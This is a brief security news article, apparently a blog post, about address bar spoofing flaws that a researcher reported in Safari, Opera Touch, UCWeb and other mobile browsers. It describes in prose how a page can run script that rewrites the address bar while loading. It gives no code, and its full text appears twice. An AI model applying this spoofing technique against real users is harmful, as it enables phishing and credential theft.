Google Vulnerability Reward Program (VRP) classifies the address bar as the most reliable security indicator in validating the authenticity of the website; but not wiith recent discovery about an address bar spoofing vulnerabilities affecting multiple mobile browsers.

According to Rafay Baloch, a cybersecurity researcher, the address bar spoofing vulnerabilities affects multiple mobile browsers, including Apple Safari, Opera Touch, Yandex Browser, UCWeb, Bolt Browser, and RITS Browser, which flaw leaves the door open for spear-phishing and malware attacks.

While UCWeb and Bolt are yet to release patches for their respective browsers, Opera is expected to release a fix for Opera Touch on November 11, 2020.

How the Address Bar Spoofing Vulnerabilities Affects Multiple Mobile Browsers?



The Address Bar Spoofing Vulnerabilities stem from the use of malicious executable JavaScript code in compromised website to force the browser to update the address bar, even while the page is still loading, changing the destination URL to another address of the attacker's choice.



And the vulnerability in Safari occurs due to the browser's preserving of address bar of the URL when requested over an arbitrary port, with the set interval function reloading bing.com:8080 every 2 milliseconds; hence users are unable to recognize the redirection from original URL to the spoofed URL.

Similar issues have also been found in several other major browsers, and once the coordinated disclosure timeline has elapsed, they will be made public. However, what makes the Safari vulnerability more pronounce is that the browser by default doesn't reveal port number in URL unless focus is set via cursor.

How Web users can stay safe from such Address Bar Spoofing Vulnerabilities



It is now pretty easy to coax users into disclosing their personal information which hackers steal and use in distributing malware with the address bar seemingly pointing to a trusted website and giving no indicator of forgery, which exploits a specific flaw in the browser, to evade several anti-phishing solutions.

Therefore, web users are enjoined to always look out for browser-based vulnerabilities such as the address bar spoofing which may exacerbate the success of spear-phishing attacks and hence, could prove to be more dangerous.

Address Bar Spoofing Vulnerabilities In Multiple Mobile Browsers

Google Vulnerability Reward Program (VRP) classifies the address bar as the most reliable security indicator in validating the authenticity of the website; but not wiith recent discovery about an address bar spoofing vulnerabilities affecting multiple mobile browsers.

According to Rafay Baloch, a cybersecurity researcher, the address bar spoofing vulnerabilities affects multiple mobile browsers, including Apple Safari, Opera Touch, Yandex Browser, UCWeb, Bolt Browser, and RITS Browser, which flaw leaves the door open for spear-phishing and malware attacks.

While UCWeb and Bolt are yet to release patches for their respective browsers, Opera is expected to release a fix for Opera Touch on November 11, 2020.

How the Address Bar Spoofing Vulnerabilities Affects Multiple Mobile Browsers?



The Address Bar Spoofing Vulnerabilities stem from the use of malicious executable JavaScript code in compromised website to force the browser to update the address bar, even while the page is still loading, changing the destination URL to another address of the attacker's choice.



And the vulnerability in Safari occurs due to the browser's preserving of address bar of the URL when requested over an arbitrary port, with the set interval function reloading bing.com:8080 every 2 milliseconds; hence users are unable to recognize the redirection from original URL to the spoofed URL.

Similar issues have also been found in several other major browsers, and once the coordinated disclosure timeline has elapsed, they will be made public. However, what makes the Safari vulnerability more pronounce is that the browser by default doesn't reveal port number in URL unless focus is set via cursor.

How Web users can stay safe from such Address Bar Spoofing Vulnerabilities



It is now pretty easy to coax users into disclosing their personal information which hackers steal and use in distributing malware with the address bar seemingly pointing to a trusted website and giving no indicator of forgery, which exploits a specific flaw in the browser, to evade several anti-phishing solutions.

Therefore, web users are enjoined to always look out for browser-based vulnerabilities such as the address bar spoofing which may exacerbate the success of spear-phishing attacks and hence, could prove to be more dangerous.

No comments